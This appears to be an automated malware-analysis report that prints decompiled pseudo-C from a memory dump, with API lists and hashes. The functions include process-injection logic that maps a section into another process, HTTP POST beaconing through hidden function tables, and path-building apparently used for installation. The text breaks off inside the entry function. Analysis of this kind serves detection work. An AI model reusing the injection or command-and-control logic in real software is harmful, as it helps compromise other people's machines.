    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
    • String ID: FALSE$TRUE
    • API String ID: 1290676130-1412513891
    • Opcode ID: 01324e7683dd64bd24ea8eccb90f2fcb5d6adeb45f11a67750baea2302c7d2b1
    • Instruction ID: 0013a94485d77bb02ced71d365a5174c2c9eaf15ab6d75ea9e838a9667b432a9
    • Opcode Fuzzy Hash: 01324e7683dd64bd24ea8eccb90f2fcb5d6adeb45f11a67750baea2302c7d2b1
    • Instruction Fuzzy Hash: 14E18E71E04219EFDB14DFA4CD85AEEBBB9FF08301F105959E906BB291DB70A909CB50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 59%
    			E00E5C6CB(intOrPtr __ecx, intOrPtr __edx) {
    				signed int _v8;
    				char _v12;
    				char _v16;
    				intOrPtr _v20;
    				char _v24;
    				char _v28;
    				char _v32;
    				intOrPtr _v36;
    				struct HINSTANCE__* _v40;
    				char _v44;
    				char _v56;
    				char _v72;
    				struct _WNDCLASSEXA _v120;
    				intOrPtr _t69;
    				intOrPtr _t71;
    				intOrPtr _t75;
    				intOrPtr _t80;
    				intOrPtr _t92;
    				intOrPtr _t95;
    				intOrPtr _t96;
    				struct HWND__* _t106;
    				intOrPtr* _t113;
    				struct HINSTANCE__* _t116;
    				intOrPtr _t120;
    				intOrPtr _t126;
    				intOrPtr _t131;
    				intOrPtr _t134;
    				intOrPtr _t136;
    				intOrPtr _t139;
    				char _t140;
    				intOrPtr _t141;
    
    				_t69 =  *0xe6e688; // 0xe80000
    				_t126 = __ecx;
    				_t134 = __edx;
    				_t116 = 0;
    				_v36 = __edx;
    				_v16 = 0;
    				_v44 = 0;
    				_v40 = 0;
    				_v12 = 0;
    				_v8 = 0;
    				_v24 = 0;
    				_v20 = __ecx;
    				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
    					E00E5E249(0x1f4);
    					_t116 = 0;
    				}
    				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
    				_v28 = _t116;
    				if( *_t113 != 0x4550) {
    					L12:
    					if(_v8 != 0) {
    						_t75 =  *0xe6e780; // 0x0
    						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
    						_v8 = _v8 & 0x00000000;
    					}
    					L14:
    					if(_v12 != 0) {
    						_t136 =  *0xe6e780; // 0x0
    						 *((intOrPtr*)(_t136 + 0x10))(GetCurrentProcess(), _v12);
    					}
    					if(_v16 != 0) {
    						_t71 =  *0xe6e780; // 0x0
    						 *((intOrPtr*)(_t71 + 0x20))(_v16);
    					}
    					return _v8;
    				}
    				_push(_t116);
    				_push(0x8000000);
    				_v44 =  *((intOrPtr*)(_t113 + 0x50));
    				_push(0x40);
    				_push( &_v44);
    				_push(_t116);
    				_push(0xe);
    				_push( &_v16);
    				_t80 =  *0xe6e780; // 0x0
    				if( *((intOrPtr*)(_t80 + 0xc))() < 0) {
    					goto L12;
    				}
    				_v120.style = 0xb;
    				_v120.cbSize = 0x30;
    				_v120.lpszClassName =  &_v56;
    				asm("movsd");
    				_v120.lpfnWndProc = DefWindowProcA;
    				asm("movsd");
    				asm("movsd");
    				asm("movsb");
    				asm("movsd");
    				asm("movsd");
    				asm("movsw");
    				asm("movsb");
    				_v120.cbWndExtra = 0;
    				_v120.lpszMenuName = 0;
    				_v120.cbClsExtra = 0;
    				_v120.hInstance = 0;
    				if(RegisterClassExA( &_v120) != 0) {
    					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
    					if(_t106 != 0) {
    						DestroyWindow(_t106);
    						UnregisterClassA( &_v56, 0);
    					}
    				}
    				_t139 =  *0xe6e780; // 0x0
    				_push(0x40);
    				_push(0);
    				_push(2);
    				_push( &_v24);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push( &_v12);
    				_push(GetCurrentProcess());
    				_push(_v16);
    				if( *((intOrPtr*)(_t139 + 0x14))() < 0) {
    					_t126 = _v20;
    					goto L12;
    				} else {
    					_push(0x40);
    					_push(0);
    					_push(2);
    					_push( &_v24);
    					_push(0);
    					_push(0);
    					_push(0);
    					_t126 = _v20;
    					_push( &_v8);
    					_t92 =  *0xe6e780; // 0x0
    					_push(_t126);
    					_push(_v16);
    					if( *((intOrPtr*)(_t92 + 0x14))() < 0) {
    						goto L12;
    					}
    					_t140 = E00E5864F( *0xe6e688, 0x1ac4);
    					_v32 = _t140;
    					if(_t140 == 0) {
    						goto L12;
    					}
    					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
    					_t95 =  *0xe6e684; // 0x510f6c8
    					_t96 =  *((intOrPtr*)(_t95 + 0x54))(_t126, 0, 0x1ac4, 0x1000, 4);
    					_t120 =  *0xe6e684; // 0x510f6c8
    					_t131 = _t96;
    					 *((intOrPtr*)(_t120 + 0x20))(_v20, _t131, _t140, 0x1ac4,  &_v28);
    					E00E58600( &_v32, 0x1ac4);
    					_t141 =  *0xe6e688; // 0xe80000
    					 *0xe6e688 = _t131;
    					E00E586C7(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
    					E00E5C64A(_v12, _v8, _v36);
    					 *0xe6e688 = _t141;
    					goto L14;
    				}
    			}

    APIs
    • RegisterClassExA.USER32(00000030), ref: 00E5C790
    • CreateWindowExA.USER32 ref: 00E5C7BB
    • DestroyWindow.USER32(00000000), ref: 00E5C7C6
    • UnregisterClassA.USER32 ref: 00E5C7D1
    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 00E5C7ED
    • GetCurrentProcess.KERNEL32(00000000), ref: 00E5C8E6
      • Part of subcall function 00E58600: RtlFreeHeap.NTDLL(00000000,00000000,00000001,000000FF,00E56020), ref: 00E58646
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: ClassCurrentProcessWindow$CreateDestroyFreeHeapRegisterUnregister
    • String ID: 0$cdcdwqwqwq$sadccdcdsasa
    • API String ID: 3082384575-2319545179
    • Opcode ID: 917125f3963f69fdff5b35e160d332fb98ec00277f56ad64d3765d23496b7cc0
    • Instruction ID: 4640b99b81f3d500a727ac5b39a45636510f17b3efae7dcbc3277e4fe369c164
    • Opcode Fuzzy Hash: 917125f3963f69fdff5b35e160d332fb98ec00277f56ad64d3765d23496b7cc0
    • Instruction Fuzzy Hash: 73715375900209AFDB14CF95DD48EAFBBB8FB48751F200569F501B7290D7B0AA08CF64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E00E5E673(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
    				char _v8;
    				char _v12;
    				signed int _v16;
    				signed int _v20;
    				char _v24;
    				intOrPtr _v28;
    				char _v32;
    				intOrPtr _v36;
    				signed int _v40;
    				signed int _v44;
    				intOrPtr _v48;
    				intOrPtr _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				char _v64;
    				int _v76;
    				void* _v80;
    				intOrPtr _v100;
    				int _v104;
    				void* _v108;
    				intOrPtr _v112;
    				intOrPtr _v116;
    				char* _v120;
    				void _v124;
    				char _v140;
    				void _v396;
    				void _v652;
    				intOrPtr _t105;
    				intOrPtr _t113;
    				intOrPtr* _t115;
    				intOrPtr _t118;
    				intOrPtr _t121;
    				intOrPtr _t124;
    				intOrPtr _t127;
    				intOrPtr _t131;
    				char _t133;
    				intOrPtr _t136;
    				char _t138;
    				char _t139;
    				intOrPtr _t141;
    				intOrPtr _t147;
    				intOrPtr _t154;
    				intOrPtr _t158;
    				intOrPtr _t162;
    				intOrPtr _t164;
    				intOrPtr _t166;
    				intOrPtr _t172;
    				intOrPtr _t176;
    				void* _t183;
    				void* _t185;
    				intOrPtr _t186;
    				char _t195;
    				intOrPtr _t203;
    				intOrPtr _t204;
    				signed int _t209;
    				void _t212;
    				intOrPtr _t213;
    				void* _t214;
    				intOrPtr _t216;
    				char _t217;
    				intOrPtr _t218;
    				signed int _t219;
    				signed int _t220;
    				void* _t221;
    
    				_v40 = _v40 & 0x00000000;
    				_v24 = 4;
    				_v36 = 1;
    				_t214 = __edx;
    				memset( &_v396, 0, 0x100);
    				memset( &_v652, 0, 0x100);
    				_v64 = E00E595AD(0x85b);
    				_v60 = E00E595AD(0xdc9);
    				_v56 = E00E595AD(0x65d);
    				_v52 = E00E595AD(0xdd3);
    				_t105 = E00E595AD(0xb74);
    				_v44 = _v44 & 0;
    				_t212 = 0x3c;
    				_v48 = _t105;
    				memset( &_v124, 0, 0x100);
    				_v116 = 0x10;
    				_v120 =  &_v140;
    				_v124 = _t212;
    				_v108 =  &_v396;
    				_v104 = 0x100;
    				_v80 =  &_v652;
    				_push( &_v124);
    				_push(0);
    				_v76 = 0x100;
    				_push(E00E5C384(_t214));
    				_t113 =  *0xe6e6a4; // 0x0
    				_push(_t214);
    				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
    					_t209 = 0;
    					_v20 = 0;
    					do {
    						_t115 =  *0xe6e6a4; // 0x0
    						_v12 = 0x8404f700;
    						_t213 =  *_t115( *0xe6e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
    						if(_t213 != 0) {
    							_t195 = 3;
    							_t185 = 4;
    							_v8 = _t195;
    							_t118 =  *0xe6e6a4; // 0x0
    							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
    							_v8 = 0x3a98;
    							_t121 =  *0xe6e6a4; // 0x0
    							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
    							_v8 = 0x493e0;
    							_t124 =  *0xe6e6a4; // 0x0
    							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
    							_v8 = 0x493e0;
    							_t127 =  *0xe6e6a4; // 0x0
    							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
    							_t131 =  *0xe6e6a4; // 0x0
    							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
    							if(_a24 != 0) {
    								E00E597F2(_a24);
    							}
    							if(_t186 != 0) {
    								_t133 = 0x8484f700;
    								if(_v112 != 4) {
    									_t133 = _v12;
    								}
    								_t136 =  *0xe6e6a4; // 0x0
    								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
    								_v8 = _t216;
    								if(_a24 != 0) {
    									E00E597F2(_a24);
    								}
    								if(_t216 != 0) {
    									_t138 = 4;
    									if(_v112 != _t138) {
    										L19:
    										_t139 = E00E595AD(0x777);
    										_t217 = _t139;
    										_v12 = _t217;
    										_t141 =  *0xe6e6a4; // 0x0
    										_t218 = _v8;
    										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E00E5C384(_t217), _a4, _a8);
    										E00E585A8( &_v12);
    										if(_a24 != 0) {
    											E00E597F2(_a24);
    										}
    										if(_v28 != 0) {
    											L28:
    											_v24 = 8;
    											_push(0);
    											_v32 = 0;
    											_v28 = 0;
    											_push( &_v24);
    											_push( &_v32);
    											_t147 =  *0xe6e6a4; // 0x0
    											_push(0x13);
    											_push(_t218);
    											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
    												_t219 = E00E5972F( &_v32);
    												if(_t219 == 0xc8) {
    													 *_a20 = _v8;
    													 *_a12 = _t213;
    													 *_a16 = _t186;
    													return 0;
    												}
    												_t220 =  ~_t219;
    												L32:
    												_t154 =  *0xe6e6a4; // 0x0
    												 *((intOrPtr*)(_t154 + 8))(_v8);
    												L33:
    												if(_t186 != 0) {
    													_t158 =  *0xe6e6a4; // 0x0
    													 *((intOrPtr*)(_t158 + 8))(_t186);
    												}
    												if(_t213 != 0) {
    													_t203 =  *0xe6e6a4; // 0x0
    													 *((intOrPtr*)(_t203 + 8))(_t213);
    												}
    												return _t220;
    											}
    											GetLastError();
    											_t220 = 0xfffffff8;
    											goto L32;
    										} else {
    											GetLastError();
    											_t162 =  *0xe6e6a4; // 0x0
    											 *((intOrPtr*)(_t162 + 8))(_t218);
    											_t218 = 0;
    											goto L23;
    										}
    									}
    									_v12 = _t138;
    									_push( &_v12);
    									_push( &_v16);
    									_t172 =  *0xe6e6a4; // 0x0
    									_push(0x1f);
    									_push(_t216);
    									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
    										L18:
    										GetLastError();
    										goto L19;
    									}
    									_v16 = _v16 | 0x00003380;
    									_push(4);
    									_push( &_v16);
    									_t176 =  *0xe6e6a4; // 0x0
    									_push(0x1f);
    									_push(_t216);
    									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
    										goto L19;
    									}
    									goto L18;
    								} else {
    									GetLastError();
    									L23:
    									_t164 =  *0xe6e6a4; // 0x0
    									 *((intOrPtr*)(_t164 + 8))(_t186);
    									_t186 = 0;
    									goto L24;
    								}
    							} else {
    								GetLastError();
    								L24:
    								_t166 =  *0xe6e6a4; // 0x0
    								 *((intOrPtr*)(_t166 + 8))(_t213);
    								_t213 = 0;
    								goto L25;
    							}
    						}
    						GetLastError();
    						L25:
    						_t204 = _t218;
    						_t209 = _v20 + 1;
    						_v20 = _t209;
    					} while (_t209 < 2);
    					_v8 = _t218;
    					if(_t204 != 0) {
    						goto L28;
    					}
    					_t220 = 0xfffffffe;
    					goto L33;
    				}
    				_t183 = 0xfffffffc;
    				return _t183;
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: memset$ErrorLast
    • String ID: POST
    • API String ID: 2570506013-1814004025
    • Opcode ID: 9ac4c8cb652c7876c55880ab37520042115c07365bf312f92fd6cea06cd6aae3
    • Instruction ID: 52c433c5f8857f746151e236b9a182ff907c17a43fde6af3e077c170f327c76b
    • Opcode Fuzzy Hash: 9ac4c8cb652c7876c55880ab37520042115c07365bf312f92fd6cea06cd6aae3
    • Instruction Fuzzy Hash: EBB16C71900208EFDB14DFA5DC88AEE7BB8EF48341F104469F905FB290DBB49A49CB61
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 28%
    			E00E616C3(signed int* _a4) {
    				char _v8;
    				_Unknown_base(*)()* _v12;
    				_Unknown_base(*)()* _v16;
    				char _v20;
    				_Unknown_base(*)()* _t16;
    				_Unknown_base(*)()* _t17;
    				void* _t22;
    				intOrPtr* _t28;
    				signed int _t29;
    				signed int _t30;
    				struct HINSTANCE__* _t32;
    				void* _t34;
    
    				_t30 = 0;
    				_v8 = 0;
    				_t32 = GetModuleHandleA("advapi32.dll");
    				if(_t32 == 0) {
    					L9:
    					return 1;
    				}
    				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
    				_v12 = _t16;
    				if(_t16 == 0) {
    					goto L9;
    				}
    				_t17 = GetProcAddress(_t32, "CryptGenRandom");
    				_v16 = _t17;
    				if(_t17 == 0) {
    					goto L9;
    				}
    				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
    				if(_t28 == 0) {
    					goto L9;
    				}
    				_push(0xf0000000);
    				_push(1);
    				_push(0);
    				_push(0);
    				_push( &_v8);
    				if(_v12() == 0) {
    					goto L9;
    				}
    				_t22 = _v16(_v8, 4,  &_v20);
    				 *_t28(_v8, 0);
    				if(_t22 == 0) {
    					goto L9;
    				}
    				_t29 = 0;
    				do {
    					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
    					_t29 = _t29 + 1;
    				} while (_t29 < 4);
    				 *_a4 = _t30;
    				return 0;
    			}

    APIs
    • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,00E57640,?,?,00000000,?), ref: 00E616D6
    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00E616EE
    • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 00E616FD
    • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 00E6170C
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: AddressProc$HandleModule
    • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
    • API String ID: 667068680-129414566
    • Opcode ID: 382de728ceaf7398f6dd06d3bb58e7145bd5af8d201a289de027c0997728e5cf
    • Instruction ID: bf48341045690619f82100034eee5eaf329774a1218c8a9c9a0855f37a473d72
    • Opcode Fuzzy Hash: 382de728ceaf7398f6dd06d3bb58e7145bd5af8d201a289de027c0997728e5cf
    • Instruction Fuzzy Hash: D711EB31A80719BBDB125BB6AC94EBF7BB9EF45784F0404A5E601F3141DE70EA008754
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E00E6212D(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
    				signed int _t12;
    				signed int _t13;
    				int _t15;
    				char* _t24;
    				char* _t26;
    				char* _t28;
    				char* _t29;
    				signed int _t40;
    				char* _t43;
    				char* _t45;
    				long long* _t47;
    
    				_t12 = _a20;
    				if(_t12 == 0) {
    					_t12 = 0x11;
    				}
    				_t26 = _a4;
    				_push(_t30);
    				 *_t47 = _a12;
    				_push(_t12);
    				_push("%.*g");
    				_push(_a8);
    				_push(_t26);
    				L00E62290();
    				_t40 = _t12;
    				if(_t40 < 0 || _t40 >= _a8) {
    					L19:
    					_t13 = _t12 | 0xffffffff;
    					goto L20;
    				} else {
    					L00E622D8();
    					_t15 =  *((intOrPtr*)( *_t12));
    					if(_t15 != 0x2e) {
    						_t24 = strchr(_t26, _t15);
    						if(_t24 != 0) {
    							 *_t24 = 0x2e;
    						}
    					}
    					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
    						L11:
    						_t43 = strchr(_t26, 0x65);
    						_t28 = _t43;
    						if(_t43 == 0) {
    							L18:
    							_t13 = _t40;
    							L20:
    							return _t13;
    						}
    						_t45 = _t43 + 1;
    						_t29 = _t28 + 2;
    						if( *_t45 == 0x2d) {
    							_t45 = _t29;
    						}
    						while( *_t29 == 0x30) {
    							_t29 = _t29 + 1;
    						}
    						if(_t29 != _t45) {
    							E00E586EC(_t45, _t29, _t40 - _t29 + _a4);
    							_t40 = _t40 + _t45 - _t29;
    						}
    						goto L18;
    					} else {
    						_t6 = _t40 + 3; // 0xe609bd
    						_t12 = _t6;
    						if(_t12 >= _a8) {
    							goto L19;
    						}
    						_t26[_t40] = 0x302e;
    						( &(_t26[2]))[_t40] = 0;
    						_t40 = _t40 + 2;
    						goto L11;
    					}
    				}
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: strchr$_snprintflocaleconv
    • String ID: %.*g
    • API String ID: 1910550357-952554281
    • Opcode ID: 03787e576d6c367053676d438299eabc05c85c920a023f15d90e0223c3df8baf
    • Instruction ID: 7b71ca783b0aefb5e122e0409623cfb574486e526ae08d0da06c24c263bab2a1
    • Opcode Fuzzy Hash: 03787e576d6c367053676d438299eabc05c85c920a023f15d90e0223c3df8baf
    • Instruction Fuzzy Hash: B52168766C8E062AD7245A28BC91BA777CCDB027B4F14351DFF10BB1A2D664DD4083A0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: _snprintfqsort
    • String ID: %I64d$false$null$true
    • API String ID: 756996078-4285102228
    • Opcode ID: d615f194bfd598907900493340e545e4fef52fb6396b19e9ee48a8ae0a1b3772
    • Instruction ID: c9abe43931b601d0a7b29882f3f2c3c8687f1f3f84015087ab5bf17c9ee64036
    • Opcode Fuzzy Hash: d615f194bfd598907900493340e545e4fef52fb6396b19e9ee48a8ae0a1b3772
    • Instruction Fuzzy Hash: B7E1BE7198021ABFDF11AF64EC42EAF3BA9EF553C4F005025FD15B6251EA31DA618BA0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E00E54A0C(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
    				char _v516;
    				void _v1044;
    				char _v1076;
    				signed int _v1080;
    				signed int _v1096;
    				WCHAR* _v1100;
    				intOrPtr _v1104;
    				signed int _v1108;
    				intOrPtr _v1112;
    				intOrPtr _v1116;
    				char _v1144;
    				char _v1148;
    				void* __esi;
    				intOrPtr _t66;
    				intOrPtr _t73;
    				signed int _t75;
    				intOrPtr _t76;
    				signed int _t81;
    				WCHAR* _t87;
    				void* _t89;
    				signed int _t90;
    				signed int _t91;
    				signed int _t93;
    				signed int _t94;
    				WCHAR* _t96;
    				intOrPtr _t106;
    				intOrPtr _t107;
    				void* _t108;
    				intOrPtr _t109;
    				signed char _t116;
    				WCHAR* _t118;
    				void* _t122;
    				signed int _t123;
    				intOrPtr _t125;
    				void* _t128;
    				void* _t129;
    				WCHAR* _t130;
    				void* _t134;
    				void* _t141;
    				void* _t143;
    				WCHAR* _t145;
    				signed int _t153;
    				void* _t154;
    				void* _t178;
    				signed int _t180;
    				void* _t181;
    				void* _t183;
    				void* _t187;
    				signed int _t188;
    				WCHAR* _t190;
    				signed int _t191;
    				signed int _t192;
    				intOrPtr* _t194;
    				signed int _t196;
    				void* _t199;
    				void* _t200;
    				void* _t201;
    				void* _t202;
    				intOrPtr* _t203;
    				void* _t208;
    
    				_t208 = __fp0;
    				_push(_t191);
    				_t128 = __edx;
    				_t187 = __ecx;
    				_t192 = _t191 | 0xffffffff;
    				memset( &_v1044, 0, 0x20c);
    				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
    				_v1108 = 1;
    				if(_t187 != 0) {
    					_t123 =  *0xe6e688; // 0xe80000
    					_t125 =  *0xe6e68c; // 0x510f890
    					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
    				}
    				if(E00E5BB73(_t187) != 0) {
    					L4:
    					_t134 = _t128;
    					_t66 = E00E5B78E(_t134,  &_v516);
    					_push(_t134);
    					_v1104 = _t66;
    					E00E5B663(_t66,  &_v1076, _t206, _t208);
    					_t129 = E00E549C8( &_v1076,  &_v1076, _t206);
    					_t141 = E00E5D40B( &_v1076, E00E5C384( &_v1076), 0);
    					E00E5B870(_t141,  &_v1100, _t208);
    					_t175 =  &_v1076;
    					_t73 = E00E52C8F(_t187,  &_v1076, _t206, _t208);
    					_v1112 = _t73;
    					_t143 = _t141;
    					if(_t73 != 0) {
    						_push(0);
    						_push(_t129);
    						_push("\\");
    						_t130 = E00E592CB(_t73);
    						_t200 = _t199 + 0x10;
    						_t75 =  *0xe6e688; // 0xe80000
    						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
    						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
    							L12:
    							__eflags = _v1108;
    							if(__eflags != 0) {
    								_t76 = E00E591C9(_v1112);
    								_t145 = _t130;
    								 *0xe6e740 = _t76;
    								 *0xe6e738 = E00E591C9(_t145);
    								L17:
    								_push(_t145);
    								_t188 = E00E59B29( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100);
    								_t201 = _t200 + 0x10;
    								__eflags = _t188;
    								if(_t188 == 0) {
    									goto L41;
    								}
    								_push(0xe6b9c2);
    								E00E59F2E(0xe);
    								E00E59F52(_t188, _t208, _t130);
    								_t194 = _a4;
    								_v1096 = _v1096 & 0x00000000;
    								_push(2);
    								_v1100 =  *_t194;
    								_push(8);
    								_push( &_v1100);
    								_t178 = 0xb;
    								E00E5A091(_t188, _t178, _t208);
    								_t179 =  *(_t194 + 0x10);
    								_t202 = _t201 + 0xc;
    								__eflags =  *(_t194 + 0x10);
    								if( *(_t194 + 0x10) != 0) {
    									E00E5A3D3(_t188, _t179, _t208);
    								}
    								_t180 =  *(_t194 + 0xc);
    								__eflags = _t180;
    								if(_t180 != 0) {
    									E00E5A3D3(_t188, _t180, _t208);
    								}
    								_t87 = E00E597F2(0);
    								_push(2);
    								_v1100 = _t87;
    								_t153 = _t188;
    								_push(8);
    								_v1096 = _t180;
    								_push( &_v1100);
    								_t181 = 2;
    								_t89 = E00E5A091(_t153, _t181, _t208);
    								_t203 = _t202 + 0xc;
    								__eflags = _v1108;
    								if(_v1108 == 0) {
    									_t153 =  *0xe6e688; // 0xe80000
    									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
    									if(__eflags != 0) {
    										_t90 = E00E5FC2A(_t89, _t181, _t208, 0, _t130, 0);
    										_t203 = _t203 + 0xc;
    										goto L26;
    									}
    									_t153 = _t153 + 0x228;
    									goto L25;
    								} else {
    									_t91 =  *0xe6e688; // 0xe80000
    									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
    									if(__eflags != 0) {
    										L32:
    										__eflags =  *(_t91 + 0x1898) & 0x00000082;
    										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
    											_t183 = 0x64;
    											E00E5E249(_t183);
    										}
    										E00E552A8( &_v1076, _t208);
    										_t190 = _a8;
    										_t154 = _t153;
    										__eflags = _t190;
    										if(_t190 != 0) {
    											_t94 =  *0xe6e688; // 0xe80000
    											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
    											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
    												lstrcpyW(_t190, _t130);
    											} else {
    												_t96 = E00E5109A(_t154, 0x228);
    												_v1100 = _t96;
    												lstrcpyW(_t190, _t96);
    												E00E585BB( &_v1100);
    												 *_t203 = "\"";
    												lstrcatW(_t190, ??);
    												lstrcatW(_t190, _t130);
    												lstrcatW(_t190, "\"");
    											}
    										}
    										_t93 = _a12;
    										__eflags = _t93;
    										if(_t93 != 0) {
    											 *_t93 = _v1104;
    										}
    										_t192 = 0;
    										__eflags = 0;
    										goto L41;
    									}
    									_t51 = _t91 + 0x228; // 0xe80228
    									_t153 = _t51;
    									L25:
    									_t90 = E00E55527(_t153, _t130, __eflags);
    									L26:
    									__eflags = _t90;
    									if(_t90 >= 0) {
    										_t91 =  *0xe6e688; // 0xe80000
    										goto L32;
    									}
    									_push(0xfffffffd);
    									L6:
    									_pop(_t192);
    									goto L41;
    								}
    							}
    							_t106 = E00E5C29D(_v1104, __eflags);
    							_v1112 = _t106;
    							_t107 =  *0xe6e684; // 0x510f6c8
    							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
    							__eflags = _t108 - _t192;
    							if(_t108 != _t192) {
    								_t109 =  *0xe6e684; // 0x510f6c8
    								 *((intOrPtr*)(_t109 + 0x30))();
    								E00E58600( &_v1148, _t192);
    								_t145 = _t108;
    								goto L17;
    							}
    							E00E58600( &_v1144, _t192);
    							_t81 = 1;
    							goto L42;
    						}
    						_t116 =  *(_t75 + 0x1898);
    						__eflags = _t116 & 0x00000004;
    						if((_t116 & 0x00000004) == 0) {
    							__eflags = _t116;
    							if(_t116 != 0) {
    								goto L12;
    							}
    							L11:
    							E00E5E291(_v1112, _t175);
    							goto L12;
    						}
    						_v1080 = _v1080 & 0x00000000;
    						_t118 = E00E595C7(_t143, 0x879);
    						_v1100 = _t118;
    						_t175 = _t118;
    						E00E5BFF7(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
    						E00E585BB( &_v1100);
    						_t200 = _t200 + 0x14;
    						goto L11;
    					}
    					_push(0xfffffffe);
    					goto L6;
    				} else {
    					_t122 = E00E52BA4( &_v1044, _t192, 0x105);
    					_t206 = _t122;
    					if(_t122 == 0) {
    						L41:
    						_t81 = _t192;
    						L42:
    						return _t81;
    					}
    					goto L4;
    				}
    			}

    APIs
    • memset.MSVCRT ref: 00E54A2E
    • lstrcpyW.KERNEL32(00000000,00000000), ref: 00E54D20
    • lstrcatW.KERNEL32(00000000,?), ref: 00E54D3E
    • lstrcatW.KERNEL32(00000000,00000000), ref: 00E54D42
    • lstrcatW.KERNEL32(00000000,00E6B994), ref: 00E54D4A
    • lstrcpyW.KERNEL32(00000000,00000000), ref: 00E54D50
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: lstrcat$lstrcpy$memset
    • String ID:
    • API String ID: 1985475764-0
    • Opcode ID: 9f13834be487d8c43da45f976545d92927a686be94b870b6b1d517919b95429a
    • Instruction ID: 99811868910b68cbfe016ed87678507907a5e234ffcb3787f8eb63ca0337c7eb
    • Opcode Fuzzy Hash: 9f13834be487d8c43da45f976545d92927a686be94b870b6b1d517919b95429a
    • Instruction Fuzzy Hash: A391B271604300AFE714EB20D846BBB73E5ABC471AF145D2DF955BB2D1EBB0984C8B52
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
    				char _v8;
    				char _v16;
    				short _v144;
    				short _v664;
    				void* _t20;
    				struct HINSTANCE__* _t23;
    				long _t24;
    				long _t25;
    				char* _t29;
    				WCHAR* _t34;
    				long _t35;
    				intOrPtr _t39;
    				intOrPtr _t40;
    				intOrPtr _t42;
    				void* _t52;
    				int _t56;
    				void* _t57;
    				intOrPtr* _t58;
